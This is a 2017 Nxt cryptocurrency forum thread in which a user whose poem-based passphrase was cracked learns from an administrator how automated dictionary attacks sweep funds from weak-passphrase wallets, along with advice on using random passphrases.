Nxt Forum

Please login or register.

Login with username, password and session length
Advanced search  

News:

Latest Nxt Client 1.11.10 - NEW RELEASE: Ardor 2.0.6e TestNet - The Ignis ICO is over!! Ardor genesis snapshots will happen in the last week of December

Pages: [1]

Author Topic: am i hacked ?  (Read 645 times)

mael

  • Jr. Member
  • **
  • Offline Offline
  • Posts: 15
    • View Profile
  • Karma: +1/-0
am i hacked ?
September 26, 2017, 11:13:25 am

hi
i have nxt on the official wallet for a long time but i don't use it (this is an old computer).
Yesterday, i take a look to my wallet with nxtportal, and i see transactions and transfer, i've lost my nxt, ardor and some assets.
The transaction was made august 20, my nxt are now on another adress.

My password is very very long, is it an hack ?
(can i give my adress here to see that ?)

thanks for your help.

cayenne

  • Full Member
  • ***
  • Offline Offline
  • Posts: 217
    • View Profile
  • Karma: +10/-1
Re: am i hacked ?
September 26, 2017, 11:32:02 am

post your NXT account number (not your password).
How did you choose the password? Length is not secure unless it is also random.

mael

  • Jr. Member
  • **
  • Offline Offline
  • Posts: 15
    • View Profile
  • Karma: +1/-0
Re: am i hacked ?
September 26, 2017, 02:15:09 pm

NXT-F34B-VQUT-NZ9U-4STEN

my password is a poetry piece, i copy-paste, it seems i haven't keylogger

starik69

  • Sr. Member
  • ****
  • Offline Offline
  • Posts: 263
    • View Profile
  • Karma: +11/-17
Re: am i hacked ?
September 26, 2017, 06:56:11 pm

my password is a poetry piece
Big mistake  :( It can be easilly cracked :'(
NXT-R2U6-22MC-LQL2-22222 (648774468) - NXT | All versions of NXT client and more - https://mega.co.nz/#F!J1xmgAyC!cnaqdxHALLMGiS0hTPrhAg

mael

  • Jr. Member
  • **
  • Offline Offline
  • Posts: 15
    • View Profile
  • Karma: +1/-0
Re: am i hacked ?
September 26, 2017, 07:03:43 pm

Some verses, with uppercase and special characters...are you sure ?

mael

  • Jr. Member
  • **
  • Offline Offline
  • Posts: 15
    • View Profile
  • Karma: +1/-0
Re: am i hacked ?
September 26, 2017, 07:53:25 pm

other thing: the adress who got my NXT (NXT-XVBJ-B8VA-Q7MB-HGZXQ) has received a lot of transactions the same day, same hour. What's this ?

VanBreuk

  • Administrator
  • Hero Member
  • *****
  • Offline Offline
  • Posts: 2657
    • View Profile
  • Karma: +349/-18
Re: am i hacked ?
September 26, 2017, 08:25:00 pm

other thing: the adress who got my NXT (NXT-XVBJ-B8VA-Q7MB-HGZXQ) has received a lot of transactions the same day, same hour. What's this ?

This appears to be someone running a script to parse lots of insecure / low-entropy passphrases to find Nxt addresses with any balance in them, and when balance is found, automatically transfer it to the hacker's account. 

As implied above, any low entropy passphrases (too short, composed with little variety of characters, or just not really random) can be easily cracked. Passphrases made with lines of a song, or a poem, or a novel have also a good chance of being cracked. This happened a few times since Nxt started.

As a general rule, if you can remember easily a passphrase it is not secure enough. Or if you can find it online easily, as it happens with songs or poems. The passphrase IS the account, and skilled hackers will sooner or later steal balances sitting in accounts with insecure passphrases.

I'm sorry about what happened, but besides taking the hard lesson and following from now on the recommended security practices in cryptocurrency software (like using the type of random generated passphrase produced by the Nxt Client) all you can do is keep the Nxt address of the hacker monitored, in case he eventually transfers the NXT to some exchange or service that could help you track him down.
GPG Fingerprint: B020 D1C1 F289 3B2C 3577  9EAD 455D D175 5913 C7F1

mael

  • Jr. Member
  • **
  • Offline Offline
  • Posts: 15
    • View Profile
  • Karma: +1/-0
Re: am i hacked ?
September 27, 2017, 07:38:18 pm

I don't understand, all the wallets have been hacked same time, same day ? strange !


How the hacker can manage to find a part of a poem (not in english), with more than 180 characters ? he try all the poems ?
Can not we see guy trying to log thousand of times ?
« Last Edit: September 27, 2017, 08:15:19 pm by mael »

VanBreuk

  • Administrator
  • Hero Member
  • *****
  • Offline Offline
  • Posts: 2657
    • View Profile
  • Karma: +349/-18
Re: am i hacked ?
September 27, 2017, 10:00:29 pm

I don't understand, all the wallets have been hacked same time, same day ? strange !

How the hacker can manage to find a part of a poem (not in english), with more than 180 characters ? he try all the poems ?
Can not we see guy trying to log thousand of times ?

This is not someone aiming for a specific account and trying to find the passphrase for that account precisely. If this was so, the attacker would rather spend all his resources to crack an account with millions of NXT in it (and fail).

See the incoming transactions in the hacker's account. We don't know for sure if all transactions correspond to cracked accounts, but most are pretty small amounts. These seem to come from accounts with insecure passphrases and some NXT in them that were found by the attacker randomly, running a script that maybe allows to check every second thousands of possible passphrases.

Cryptocurrency platforms do not have a central security point, where passwords are stored somehow encrypted and you have an access log. In the case of Nxt among others, anything you introduce as passphrase in the client will unlock an account. Try it. If you use as passphrase for instance "dog" you will access account NXT-DMXF-2AJR-BB5L-EQZ2L, after the client warns you about an obviously insecure passphrase. If you try a different word or string (even if you try " dog" with a space as first character) you will get a different account number. In the client back end, the passphrase is run through a series of algorithms that will return, in a deterministic way (this means that an exact passphrase string will always give the same result), a Nxt account number.

So there's always someone who will try to see if there's any NXT that can be stolen within a range of weak passphrases. If you send a few NXT to the "dog" account above, they won't last for very long. When the hacker's script processes every possible passphrase within a range, it does so by checking the NXT balance of the corresponding account, and when it's bigger than a certain amount (it should be at least bigger than 1 NXT, because you already need 1 NXT as fee to transfer any coins) it runs a NXT transfer to the account where the loot goes.

Now you ask, how did he manage to find a part of a certain poem? That depends on what is exactly the hacker searching for. Trying to check the contents of all the accounts that are unlocked by passphrases made with just integer numbers of eight or nine digits, or with a couple dictionary words, is not very interesting because it's very easy. And that means any NXT sitting in such accounts have been most likely already grabbed, and are checked very often. But hackers can use dictionaries with collections of words or strings. They can use as dictionary a small library, say the complete works of Pablo Neruda, and then try all the verse groupings between for example 8 and 32 words. Or all the possible verse pairs. Even if intuitively that seems difficult, from the perspective of a modern powerful CPU it is not and it would not take a long time.

In discussions about security topics, and specially password security, it has been advised to avoid passphrases that are a fragment of books, novels, songs, movie scripts... particularly if they can be found online. Simply because they can easily be included in the dictionary a hacker is using to go fishing. And the processing time needed to try all the combinations in such dictionaries is much lower than you think. So yes, he tried all the poems within a certain library. The only other possible explanation is that you were yourself hacked and your passphrase was stolen or captured from your keyboard, but you said that did not happen.

And finally, can we see someone "logging in" thousands or millions of times? No, because there's no central system recording all the access attempts. This is run from a machine using its own copy of the blockchain, running a lot of queries against it. You could do the same with the same code, using your Nxt client.

Security in cryptocurrency is different than what most people are used to. It's a pity that many people found this the hard way, but once you accept the hit, the best thing you can do is learn and understand so it will not happen to you ever again.
GPG Fingerprint: B020 D1C1 F289 3B2C 3577  9EAD 455D D175 5913 C7F1

mael

  • Jr. Member
  • **
  • Offline Offline
  • Posts: 15
    • View Profile
  • Karma: +1/-0
Re: am i hacked ?
September 28, 2017, 10:29:06 am

Thanks for your great explanation.
i still not understand the same time for all the transactions !

martismartis

  • Hero Member
  • *****
  • Offline Offline
  • Posts: 1230
    • View Profile
  • Karma: +70/-10
Re: am i hacked ?
September 28, 2017, 10:51:41 am

Thanks for your great explanation.
i still not understand the same time for all the transactions !

This is possible with script by using Nxt API.

VanBreuk

  • Administrator
  • Hero Member
  • *****
  • Offline Offline
  • Posts: 2657
    • View Profile
  • Karma: +349/-18
Re: am i hacked ?
September 28, 2017, 11:41:04 am

Thanks for your great explanation.
i still not understand the same time for all the transactions !

As martis said, the hacker is running a script that automatically checks many possible passphrases within a range of values. 1) Check a passphrase; 2) Is there any NXT in that account? 3) Yes? Transfer NXT to my account. No? Try next passphrase.

As the process is repeated thousands of time per second, during a range of time like a day or two a bunch of accounts with insecure passphrases are automatically, progressively cracked.
GPG Fingerprint: B020 D1C1 F289 3B2C 3577  9EAD 455D D175 5913 C7F1

mael

  • Jr. Member
  • **
  • Offline Offline
  • Posts: 15
    • View Profile
  • Karma: +1/-0
Re: am i hacked ?
September 29, 2017, 11:10:01 am

So, it's finished for me and NXT and ARDOR. 4 years in the same boat...
It was too easy for NXT-XVBJ-B8VA-Q7MB-HGZXQ to stole my money like to many others.

Bye

VanBreuk

  • Administrator
  • Hero Member
  • *****
  • Offline Offline
  • Posts: 2657
    • View Profile
  • Karma: +349/-18
Re: am i hacked ?
September 29, 2017, 12:30:58 pm

So, it's finished for me and NXT and ARDOR. 4 years in the same boat...
It was too easy for NXT-XVBJ-B8VA-Q7MB-HGZXQ to stole my money like to many others.

Bye

We're sorry to see you leave and that you lost your coins. Good luck.

But as a closing note, this only happened to users who overlooked one or more important security recommendations. It is a cautionary tale about how important it is to follow good security practices. Use the passphrases generated by the Nxt Client, and if you want to use a passphrase generated by yourself, make sure you know what you're doing and that your passphrase is truly random and secure enough. If you use a secure passphrase, and you keep it securely stored, your coins will be safe - in Nxt and in any other cryptocurrency platform.
GPG Fingerprint: B020 D1C1 F289 3B2C 3577  9EAD 455D D175 5913 C7F1
Pages: [1]